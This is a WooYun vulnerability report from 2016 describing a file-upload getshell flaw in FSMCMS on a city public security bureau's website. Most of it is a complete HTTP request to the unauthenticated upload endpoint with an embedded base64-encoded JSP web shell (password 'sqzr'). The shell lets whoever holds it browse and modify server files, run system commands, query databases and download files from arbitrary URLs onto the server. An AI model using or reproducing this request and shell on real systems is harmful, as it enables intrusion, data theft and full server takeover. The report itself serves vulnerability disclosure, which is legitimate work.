当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170795

漏洞标题:某市公安局存在GETSHELL漏洞

相关厂商:XXX市公安局

漏洞作者: x7iao

提交时间:2016-01-18 12:56

修复时间:2016-03-05 09:52

公开时间:2016-03-05 09:52

漏洞类型:系统/服务补丁不及时

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-18: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经确认,细节仅向厂商公开
2016-01-30: 细节向核心白帽子及相关领域专家公开
2016-02-09: 细节向普通白帽子公开
2016-02-19: 细节向实习白帽子公开
2016-03-05: 细节向公众公开

简要描述:

简简单单就get

详细说明:

包头市公安局
http://**.**.**.**/
FSMCMS
POST数据包

POST /fsmcms/cms/client/uploadpic_html.jsp?toname=xx.jsp&diskno=xxxx HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=926A858F3F6B1690938B6CC4BDED6F5D; _gscu_1821011484=53090211p8148l20; _gscs_1821011484=53090211wim2n620|pv:1; _gscbrs_1821011484=1; Hm_lvt_adb4ad59880d9738ef047f3f429bf42b=1453090209; Hm_lpvt_adb4ad59880d9738ef047f3f429bf42b=1453090216
Content-Length: 12961
<?xml version="1.0" encoding="UTF-8"?>
<root>
PCVAcGFnZSBpbXBvcnQ9ImphdmEuaW8uKixqYXZhLnV0aWwuKixqYXZhLm5ldC4qLGphdmEuc3FsLiosamF2YS50ZXh0LioiJT4KPCUhU3RyaW5nIFB3ZCA9ICJzcXpyIjsKIAogICAgU3RyaW5nIEVDKFN0cmluZyBzLCBTdHJpbmcgYykgdGhyb3dzIEV4Y2VwdGlvbiB7CiAgICAgICAgcmV0dXJuIHM7CiAgICB9Ly9uZXcgU3RyaW5nKHMuZ2V0Qnl0ZXMoIklTTy04ODU5LTEiKSxjKTt9CiAKICAgIENvbm5lY3Rpb24gR0MoU3RyaW5nIHMpIHRocm93cyBFeGNlcHRpb24gewogICAgICAgIFN0cmluZ1tdIHggPSBzLnRyaW0oKS5zcGxpdCgiXHJcbiIpOwogICAgICAgIENsYXNzLmZvck5hbWUoeFswXS50cmltKCkpLm5ld0luc3RhbmNlKCk7CiAgICAgICAgQ29ubmVjdGlvbiBjID0gRHJpdmVyTWFuYWdlci5nZXRDb25uZWN0aW9uKHhbMV0udHJpbSgpKTsKICAgICAgICBpZiAoeC5sZW5ndGggPiAyKSB7CiAgICAgICAgICAgIGMuc2V0Q2F0YWxvZyh4WzJdLnRyaW0oKSk7CiAgICAgICAgfQogICAgICAgIHJldHVybiBjOwogICAgfQogCiAgICB2b2lkIEFBKFN0cmluZ0J1ZmZlciBzYikgdGhyb3dzIEV4Y2VwdGlvbiB7CiAgICAgICAgRmlsZSByW10gPSBGaWxlLmxpc3RSb290cygpOwogICAgICAgIGZvciAoaW50IGkgPSAwOyBpIDwgci5sZW5ndGg7IGkrKykgewogICAgICAgICAgICBzYi5hcHBlbmQocltpXS50b1N0cmluZygpLnN1YnN0cmluZygwLCAyKSk7CiAgICAgICAgfQogICAgfQogCiAgICB2b2lkIEJCKFN0cmluZyBzLCBTdHJpbmdCdWZmZXIgc2IpIHRocm93cyBFeGNlcHRpb24gewogICAgICAgIEZpbGUgb0YgPSBuZXcgRmlsZShzKSwgbFtdID0gb0YubGlzdEZpbGVzKCk7CiAgICAgICAgU3RyaW5nIHNULCBzUSwgc0YgPSAiIjsKICAgICAgICBqYXZhLnV0aWwuRGF0ZSBkdDsKICAgICAgICBTaW1wbGVEYXRlRm9ybWF0IGZtID0gbmV3IFNpbXBsZURhdGVGb3JtYXQoInl5eXktTU0tZGQgSEg6bW06c3MiKTsKICAgICAgICBmb3IgKGludCBpID0gMDsgaSA8IGwubGVuZ3RoOyBpKyspIHsKICAgICAgICAgICAgZHQgPSBuZXcgamF2YS51dGlsLkRhdGUobFtpXS5sYXN0TW9kaWZpZWQoKSk7CiAgICAgICAgICAgIHNUID0gZm0uZm9ybWF0KGR0KTsKICAgICAgICAgICAgc1EgPSBsW2ldLmNhblJlYWQoKSA/ICJSIiA6ICIiOwogICAgICAgICAgICBzUSArPSBsW2ldLmNhbldyaXRlKCkgPyAiIFciIDogIiI7CiAgICAgICAgICAgIGlmIChsW2ldLmlzRGlyZWN0b3J5KCkpIHsKICAgICAgICAgICAgICAgIHNiLmFwcGVuZChsW2ldLmdldE5hbWUoKSArICIvXHQiICsgc1QgKyAiXHQiICsgbFtpXS5sZW5ndGgoKQogICAgICAgICAgICAgICAgICAgICAgICArICJcdCIgKyBzUSArICJcbiIpOwogICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgc0YgKz0gbFtpXS5nZXROYW1lKCkgKyAiXHQiICsgc1QgKyAiXHQiICsgbFtpXS5sZW5ndGgoKSArICJcdCIKICAgICAgICAgICAgICAgICAgICAgICAgKyBzUSArICJcbiI7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgc2IuYXBwZW5kKHNGKTsKICAgIH0KIAogICAgdm9pZCBFRShTdHJpbmcgcykgdGhyb3dzIEV4Y2VwdGlvbiB7CiAgICAgICAgRmlsZSBmID0gbmV3IEZpbGUocyk7CiAgICAgICAgaWYgKGYuaXNEaXJlY3RvcnkoKSkgewogICAgICAgICAgICBGaWxlIHhbXSA9IGYubGlzdEZpbGVzKCk7CiAgICAgICAgICAgIGZvciAoaW50IGsgPSAwOyBrIDwgeC5sZW5ndGg7IGsrKykgewogICAgICAgICAgICAgICAgaWYgKCF4W2tdLmRlbGV0ZSgpKSB7CiAgICAgICAgICAgICAgICAgICAgRUUoeFtrXS5nZXRQYXRoKCkpOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIGYuZGVsZXRlKCk7CiAgICB9CiAKICAgIHZvaWQgRkYoU3RyaW5nIHMsIEh0dHBTZXJ2bGV0UmVzcG9uc2UgcikgdGhyb3dzIEV4Y2VwdGlvbiB7CiAgICAgICAgaW50IG47CiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVs1MTJdOwogICAgICAgIHIucmVzZXQoKTsKICAgICAgICBTZXJ2bGV0T3V0cHV0U3RyZWFtIG9zID0gci5nZXRPdXRwdXRTdHJlYW0oKTsKICAgICAgICBCdWZmZXJlZElucHV0U3RyZWFtIGlzID0gbmV3IEJ1ZmZlcmVkSW5wdXRTdHJlYW0obmV3IEZpbGVJbnB1dFN0cmVhbShzKSk7CiAgICAgICAgb3Mud3JpdGUoKCItPiIgKyAifCIpLmdldEJ5dGVzKCksIDAsIDMpOwogICAgICAgIHdoaWxlICgobiA9IGlzLnJlYWQoYiwgMCwgNTEyKSkgIT0gLTEpIHsKICAgICAgICAgICAgb3Mud3JpdGUoYiwgMCwgbik7CiAgICAgICAgfQogICAgICAgIG9zLndyaXRlKCgifCIgKyAiPC0iKS5nZXRCeXRlcygpLCAwLCAzKTsKICAgICAgICBvcy5jbG9zZSgpOwogICAgICAgIGlzLmNsb3NlKCk7CiAgICB9CiAKICAgIHZvaWQgR0coU3RyaW5nIHMsIFN0cmluZyBkKSB0aHJvd3MgRXhjZXB0aW9uIHsKICAgICAgICBTdHJpbmcgaCA9ICIwMTIzNDU2Nzg5QUJDREVGIjsKICAgICAgICBpbnQgbjsKICAgICAgICBGaWxlIGYgPSBuZXcgRmlsZShzKTsKICAgICAgICBmLmNyZWF0ZU5ld0ZpbGUoKTsKICAgICAgICBGaWxlT3V0cHV0U3RyZWFtIG9zID0gbmV3IEZpbGVPdXRwdXRTdHJlYW0oZik7CiAgICAgICAgZm9yIChpbnQgaSA9IDA7IGkgPCBkLmxlbmd0aCgpOyBpICs9IDIpIHsKICAgICAgICAgICAgb3MKICAgICAgICAgICAgICAgICAgICAud3JpdGUoKGguaW5kZXhPZihkLmNoYXJBdChpKSkgPDwgNCB8IGguaW5kZXhPZihkCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAuY2hhckF0KGkgKyAxKSkpKTsKICAgICAgICB9CiAgICAgICAgb3MuY2xvc2UoKTsKICAgIH0KIAogICAgdm9pZCBISChTdHJpbmcgcywgU3RyaW5nIGQpIHRocm93cyBFeGNlcHRpb24gewogICAgICAgIEZpbGUgc2YgPSBuZXcgRmlsZShzKSwgZGYgPSBuZXcgRmlsZShkKTsKICAgICAgICBpZiAoc2YuaXNEaXJlY3RvcnkoKSkgewogICAgICAgICAgICBpZiAoIWRmLmV4aXN0cygpKSB7CiAgICAgICAgICAgICAgICBkZi5ta2RpcigpOwogICAgICAgICAgICB9CiAgICAgICAgICAgIEZpbGUgeltdID0gc2YubGlzdEZpbGVzKCk7CiAgICAgICAgICAgIGZvciAoaW50IGogPSAwOyBqIDwgei5sZW5ndGg7IGorKykgewogICAgICAgICAgICAgICAgSEgocyArICIvIiArIHpbal0uZ2V0TmFtZSgpLCBkICsgIi8iICsgeltqXS5nZXROYW1lKCkpOwogICAgICAgICAgICB9CiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgRmlsZUlucHV0U3RyZWFtIGlzID0gbmV3IEZpbGVJbnB1dFN0cmVhbShzZik7CiAgICAgICAgICAgIEZpbGVPdXRwdXRTdHJlYW0gb3MgPSBuZXcgRmlsZU91dHB1dFN0cmVhbShkZik7CiAgICAgICAgICAgIGludCBuOwogICAgICAgICAgICBieXRlW10gYiA9IG5ldyBieXRlWzUxMl07CiAgICAgICAgICAgIHdoaWxlICgobiA9IGlzLnJlYWQoYiwgMCwgNTEyKSkgIT0gLTEpIHsKICAgICAgICAgICAgICAgIG9zLndyaXRlKGIsIDAsIG4pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIGlzLmNsb3NlKCk7CiAgICAgICAgICAgIG9zLmNsb3NlKCk7CiAgICAgICAgfQogICAgfQogCiAgICB2b2lkIElJKFN0cmluZyBzLCBTdHJpbmcgZCkgdGhyb3dzIEV4Y2VwdGlvbiB7CiAgICAgICAgRmlsZSBzZiA9IG5ldyBGaWxlKHMpLCBkZiA9IG5ldyBGaWxlKGQpOwogICAgICAgIHNmLnJlbmFtZVRvKGRmKTsKICAgIH0KIAogICAgdm9pZCBKSihTdHJpbmcgcykgdGhyb3dzIEV4Y2VwdGlvbiB7CiAgICAgICAgRmlsZSBmID0gbmV3IEZpbGUocyk7CiAgICAgICAgZi5ta2RpcigpOwogICAgfQogCiAgICB2b2lkIEtLKFN0cmluZyBzLCBTdHJpbmcgdCkgdGhyb3dzIEV4Y2VwdGlvbiB7CiAgICAgICAgRmlsZSBmID0gbmV3IEZpbGUocyk7CiAgICAgICAgU2ltcGxlRGF0ZUZvcm1hdCBmbSA9IG5ldyBTaW1wbGVEYXRlRm9ybWF0KCJ5eXl5LU1NLWRkIEhIOm1tOnNzIik7CiAgICAgICAgamF2YS51dGlsLkRhdGUgZHQgPSBmbS5wYXJzZSh0KTsKICAgICAgICBmLnNldExhc3RNb2RpZmllZChkdC5nZXRUaW1lKCkpOwogICAgfQogCiAgICB2b2lkIExMKFN0cmluZyBzLCBTdHJpbmcgZCkgdGhyb3dzIEV4Y2VwdGlvbiB7CiAgICAgICAgVVJMIHUgPSBuZXcgVVJMKHMpOwogICAgICAgIGludCBuOwogICAgICAgIEZpbGVPdXRwdXRTdHJlYW0gb3MgPSBuZXcgRmlsZU91dHB1dFN0cmVhbShkKTsKICAgICAgICBIdHRwVVJMQ29ubmVjdGlvbiBoID0gKEh0dHBVUkxDb25uZWN0aW9uKSB1Lm9wZW5Db25uZWN0aW9uKCk7CiAgICAgICAgSW5wdXRTdHJlYW0gaXMgPSBoLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVs1MTJdOwogICAgICAgIHdoaWxlICgobiA9IGlzLnJlYWQoYiwgMCwgNTEyKSkgIT0gLTEpIHsKICAgICAgICAgICAgb3Mud3JpdGUoYiwgMCwgbik7CiAgICAgICAgfQogICAgICAgIG9zLmNsb3NlKCk7CiAgICAgICAgaXMuY2xvc2UoKTsKICAgICAgICBoLmRpc2Nvbm5lY3QoKTsKICAgIH0KIAogICAgdm9pZCBNTShJbnB1dFN0cmVhbSBpcywgU3RyaW5nQnVmZmVyIHNiKSB0aHJvd3MgRXhjZXB0aW9uIHsKICAgICAgICBTdHJpbmcgbDsKICAgICAgICBCdWZmZXJlZFJlYWRlciBiciA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIoaXMpKTsKICAgICAgICB3aGlsZSAoKGwgPSBici5yZWFkTGluZSgpKSAhPSBudWxsKSB7CiAgICAgICAgICAgIHNiLmFwcGVuZChsICsgIlxyXG4iKTsKICAgICAgICB9CiAgICB9CiAKICAgIHZvaWQgTk4oU3RyaW5nIHMsIFN0cmluZ0J1ZmZlciBzYikgdGhyb3dzIEV4Y2VwdGlvbiB7CiAgICAgICAgQ29ubmVjdGlvbiBjID0gR0Mocyk7CiAgICAgICAgUmVzdWx0U2V0IHIgPSBjLmdldE1ldGFEYXRhKCkuZ2V0Q2F0YWxvZ3MoKTsKICAgICAgICB3aGlsZSAoci5uZXh0KCkpIHsKICAgICAgICAgICAgc2IuYXBwZW5kKHIuZ2V0U3RyaW5nKDEpICsgIlx0Iik7CiAgICAgICAgfQogICAgICAgIHIuY2xvc2UoKTsKICAgICAgICBjLmNsb3NlKCk7CiAgICB9CiAKICAgIHZvaWQgT08oU3RyaW5nIHMsIFN0cmluZ0J1ZmZlciBzYikgdGhyb3dzIEV4Y2VwdGlvbiB7CiAgICAgICAgQ29ubmVjdGlvbiBjID0gR0Mocyk7CiAgICAgICAgU3RyaW5nW10gdCA9IHsgIlRBQkxFIiB9OwogICAgICAgIFJlc3VsdFNldCByID0gYy5nZXRNZXRhRGF0YSgpLmdldFRhYmxlcyhudWxsLCBudWxsLCAiJSIsIHQpOwogICAgICAgIHdoaWxlIChyLm5leHQoKSkgewogICAgICAgICAgICBzYi5hcHBlbmQoci5nZXRTdHJpbmcoIlRBQkxFX05BTUUiKSArICJcdCIpOwogICAgICAgIH0KICAgICAgICByLmNsb3NlKCk7CiAgICAgICAgYy5jbG9zZSgpOwogICAgfQogCiAgICB2b2lkIFBQKFN0cmluZyBzLCBTdHJpbmdCdWZmZXIgc2IpIHRocm93cyBFeGNlcHRpb24gewogICAgICAgIFN0cmluZ1tdIHggPSBzLnRyaW0oKS5zcGxpdCgiXHJcbiIpOwogICAgICAgIENvbm5lY3Rpb24gYyA9IEdDKHMpOwogICAgICAgIFN0YXRlbWVudCBtID0gYy5jcmVhdGVTdGF0ZW1lbnQoMTAwNSwgMTAwNyk7CiAgICAgICAgUmVzdWx0U2V0IHIgPSBtLmV4ZWN1dGVRdWVyeSgic2VsZWN0ICogZnJvbSAiICsgeFszXSk7CiAgICAgICAgUmVzdWx0U2V0TWV0YURhdGEgZCA9IHIuZ2V0TWV0YURhdGEoKTsKICAgICAgICBmb3IgKGludCBpID0gMTsgaSA8PSBkLmdldENvbHVtbkNvdW50KCk7IGkrKykgewogICAgICAgICAgICBzYi5hcHBlbmQoZC5nZXRDb2x1bW5OYW1lKGkpICsgIiAoIiArIGQuZ2V0Q29sdW1uVHlwZU5hbWUoaSkKICAgICAgICAgICAgICAgICAgICArICIpXHQiKTsKICAgICAgICB9CiAgICAgICAgci5jbG9zZSgpOwogICAgICAgIG0uY2xvc2UoKTsKICAgICAgICBjLmNsb3NlKCk7CiAgICB9CiAKICAgIHZvaWQgUVEoU3RyaW5nIGNzLCBTdHJpbmcgcywgU3RyaW5nIHEsIFN0cmluZ0J1ZmZlciBzYikgdGhyb3dzIEV4Y2VwdGlvbiB7CiAgICAgICAgaW50IGk7CiAgICAgICAgQ29ubmVjdGlvbiBjID0gR0Mocyk7CiAgICAgICAgU3RhdGVtZW50IG0gPSBjLmNyZWF0ZVN0YXRlbWVudCgxMDA1LCAxMDA4KTsKICAgICAgICB0cnkgewogICAgICAgICAgICBSZXN1bHRTZXQgciA9IG0uZXhlY3V0ZVF1ZXJ5KHEpOwogICAgICAgICAgICBSZXN1bHRTZXRNZXRhRGF0YSBkID0gci5nZXRNZXRhRGF0YSgpOwogICAgICAgICAgICBpbnQgbiA9IGQuZ2V0Q29sdW1uQ291bnQoKTsKICAgICAgICAgICAgZm9yIChpID0gMTsgaSA8PSBuOyBpKyspIHsKICAgICAgICAgICAgICAgIHNiLmFwcGVuZChkLmdldENvbHVtbk5hbWUoaSkgKyAiXHR8XHQiKTsKICAgICAgICAgICAgfQogICAgICAgICAgICBzYi5hcHBlbmQoIlxyXG4iKTsKICAgICAgICAgICAgd2hpbGUgKHIubmV4dCgpKSB7CiAgICAgICAgICAgICAgICBmb3IgKGkgPSAxOyBpIDw9IG47IGkrKykgewogICAgICAgICAgICAgICAgICAgIHNiLmFwcGVuZChFQyhyLmdldFN0cmluZyhpKSwgY3MpICsgIlx0fFx0Iik7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICBzYi5hcHBlbmQoIlxyXG4iKTsKICAgICAgICAgICAgfQogICAgICAgICAgICByLmNsb3NlKCk7CiAgICAgICAgfSBjYXRjaCAoRXhjZXB0aW9uIGUpIHsKICAgICAgICAgICAgc2IuYXBwZW5kKCJSZXN1bHRcdHxcdFxyXG4iKTsKICAgICAgICAgICAgdHJ5IHsKICAgICAgICAgICAgICAgIG0uZXhlY3V0ZVVwZGF0ZShxKTsKICAgICAgICAgICAgICAgIHNiLmFwcGVuZCgiRXhlY3V0ZSBTdWNjZXNzZnVsbHkhXHR8XHRcclxuIik7CiAgICAgICAgICAgIH0gY2F0Y2ggKEV4Y2VwdGlvbiBlZSkgewogICAgICAgICAgICAgICAgc2IuYXBwZW5kKGVlLnRvU3RyaW5nKCkgKyAiXHR8XHRcclxuIik7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgbS5jbG9zZSgpOwogICAgICAgIGMuY2xvc2UoKTsKICAgIH0lPgogICAgIAogICAgIAo8JQogICAgU3RyaW5nIGNzID0gcmVxdWVzdC5nZXRQYXJhbWV0ZXIoInowIik9PW51bGw/ImdiayI6IHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJ6MCIpICsgIiI7CiAgICByZXF1ZXN0LnNldENoYXJhY3RlckVuY29kaW5nKGNzKTsKICAgIHJlc3BvbnNlLnNldENvbnRlbnRUeXBlKCJ0ZXh0L2h0bWw7Y2hhcnNldD0iICsgY3MpOwogICAgU3RyaW5nIFogPSBFQyhyZXF1ZXN0LmdldFBhcmFtZXRlcihQd2QpICsgIiIsIGNzKTsKICAgIFN0cmluZyB6MSA9IEVDKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJ6MSIpICsgIiIsIGNzKTsKICAgIFN0cmluZyB6MiA9IEVDKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJ6MiIpICsgIiIsIGNzKTsKICAgIFN0cmluZ0J1ZmZlciBzYiA9IG5ldyBTdHJpbmdCdWZmZXIoIiIpOwogICAgdHJ5IHsKICAgICAgICBzYi5hcHBlbmQoIi0+IiArICJ8Iik7CiAgICAgICAgaWYgKFouZXF1YWxzKCJBIikpIHsKICAgICAgICAgICAgU3RyaW5nIHMgPSBuZXcgRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0CiAgICAgICAgICAgICAgICAgICAgLmdldFJlcXVlc3RVUkkoKSkpLmdldFBhcmVudCgpOwogICAgICAgICAgICBzYi5hcHBlbmQocyArICJcdCIpOwogICAgICAgICAgICBpZiAoIXMuc3Vic3RyaW5nKDAsIDEpLmVxdWFscygiLyIpKSB7CiAgICAgICAgICAgICAgICBBQShzYik7CiAgICAgICAgICAgIH0KICAgICAgICB9IGVsc2UgaWYgKFouZXF1YWxzKCJCIikpIHsKICAgICAgICAgICAgQkIoejEsIHNiKTsKICAgICAgICB9IGVsc2UgaWYgKFouZXF1YWxzKCJDIikpIHsKICAgICAgICAgICAgU3RyaW5nIGwgPSAiIjsKICAgICAgICAgICAgQnVmZmVyZWRSZWFkZXIgYnIgPSBuZXcgQnVmZmVyZWRSZWFkZXIoCiAgICAgICAgICAgICAgICAgICAgbmV3IElucHV0U3RyZWFtUmVhZGVyKG5ldyBGaWxlSW5wdXRTdHJlYW0obmV3IEZpbGUoCiAgICAgICAgICAgICAgICAgICAgICAgICAgICB6MSkpKSk7CiAgICAgICAgICAgIHdoaWxlICgobCA9IGJyLnJlYWRMaW5lKCkpICE9IG51bGwpIHsKICAgICAgICAgICAgICAgIHNiLmFwcGVuZChsICsgIlxyXG4iKTsKICAgICAgICAgICAgfQogICAgICAgICAgICBici5jbG9zZSgpOwogICAgICAgIH0gZWxzZSBpZiAoWi5lcXVhbHMoIkQiKSkgewogICAgICAgICAgICBCdWZmZXJlZFdyaXRlciBidyA9IG5ldyBCdWZmZXJlZFdyaXRlcigKICAgICAgICAgICAgICAgICAgICBuZXcgT3V0cHV0U3RyZWFtV3JpdGVyKG5ldyBGaWxlT3V0cHV0U3RyZWFtKAogICAgICAgICAgICAgICAgICAgICAgICAgICAgbmV3IEZpbGUoejEpKSkpOwogICAgICAgICAgICBidy53cml0ZSh6Mik7CiAgICAgICAgICAgIGJ3LmNsb3NlKCk7CiAgICAgICAgICAgIHNiLmFwcGVuZCgiMSIpOwogICAgICAgIH0gZWxzZSBpZiAoWi5lcXVhbHMoIkUiKSkgewogICAgICAgICAgICBFRSh6MSk7CiAgICAgICAgICAgIHNiLmFwcGVuZCgiMSIpOwogICAgICAgIH0gZWxzZSBpZiAoWi5lcXVhbHMoIkYiKSkgewogICAgICAgICAgICBGRih6MSwgcmVzcG9uc2UpOwogICAgICAgIH0gZWxzZSBpZiAoWi5lcXVhbHMoIkciKSkgewogICAgICAgICAgICBHRyh6MSwgejIpOwogICAgICAgICAgICBzYi5hcHBlbmQoIjEiKTsKICAgICAgICB9IGVsc2UgaWYgKFouZXF1YWxzKCJIIikpIHsKICAgICAgICAgICAgSEgoejEsIHoyKTsKICAgICAgICAgICAgc2IuYXBwZW5kKCIxIik7CiAgICAgICAgfSBlbHNlIGlmIChaLmVxdWFscygiSSIpKSB7CiAgICAgICAgICAgIElJKHoxLCB6Mik7CiAgICAgICAgICAgIHNiLmFwcGVuZCgiMSIpOwogICAgICAgIH0gZWxzZSBpZiAoWi5lcXVhbHMoIkoiKSkgewogICAgICAgICAgICBKSih6MSk7CiAgICAgICAgICAgIHNiLmFwcGVuZCgiMSIpOwogICAgICAgIH0gZWxzZSBpZiAoWi5lcXVhbHMoIksiKSkgewogICAgICAgICAgICBLSyh6MSwgejIpOwogICAgICAgICAgICBzYi5hcHBlbmQoIjEiKTsKICAgICAgICB9IGVsc2UgaWYgKFouZXF1YWxzKCJMIikpIHsKICAgICAgICAgICAgTEwoejEsIHoyKTsKICAgICAgICAgICAgc2IuYXBwZW5kKCIxIik7CiAgICAgICAgfSBlbHNlIGlmIChaLmVxdWFscygiTSIpKSB7CiAgICAgICAgICAgIFN0cmluZ1tdIGMgPSB7IHoxLnN1YnN0cmluZygyKSwgejEuc3Vic3RyaW5nKDAsIDIpLCB6MiB9OwogICAgICAgICAgICBQcm9jZXNzIHAgPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpOwogICAgICAgICAgICBNTShwLmdldElucHV0U3RyZWFtKCksIHNiKTsKICAgICAgICAgICAgTU0ocC5nZXRFcnJvclN0cmVhbSgpLCBzYik7CiAgICAgICAgfSBlbHNlIGlmIChaLmVxdWFscygiTiIpKSB7CiAgICAgICAgICAgIE5OKHoxLCBzYik7CiAgICAgICAgfSBlbHNlIGlmIChaLmVxdWFscygiTyIpKSB7CiAgICAgICAgICAgIE9PKHoxLCBzYik7CiAgICAgICAgfSBlbHNlIGlmIChaLmVxdWFscygiUCIpKSB7CiAgICAgICAgICAgIFBQKHoxLCBzYik7CiAgICAgICAgfSBlbHNlIGlmIChaLmVxdWFscygiUSIpKSB7CiAgICAgICAgICAgIFFRKGNzLCB6MSwgejIsIHNiKTsKICAgICAgICB9CiAgICB9IGNhdGNoIChFeGNlcHRpb24gZSkgewogICAgICAgIHNiLmFwcGVuZCgiRVJST1IiICsgIjovLyAiICsgZS50b1N0cmluZygpKTsKICAgIH0KICAgIHNiLmFwcGVuZCgifCIgKyAiPC0iKTsKICAgIG91dC5wcmludChzYi50b1N0cmluZygpKTsKJT4=
</root>


一句话密码 sqzr

漏洞证明:

111.png

修复方案:

你懂的

版权声明:转载请注明来源 x7iao@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-01-20 14:45

厂商回复:

感谢提交!!
验证确认所描述的问题,已通知其修复。

最新状态:

暂无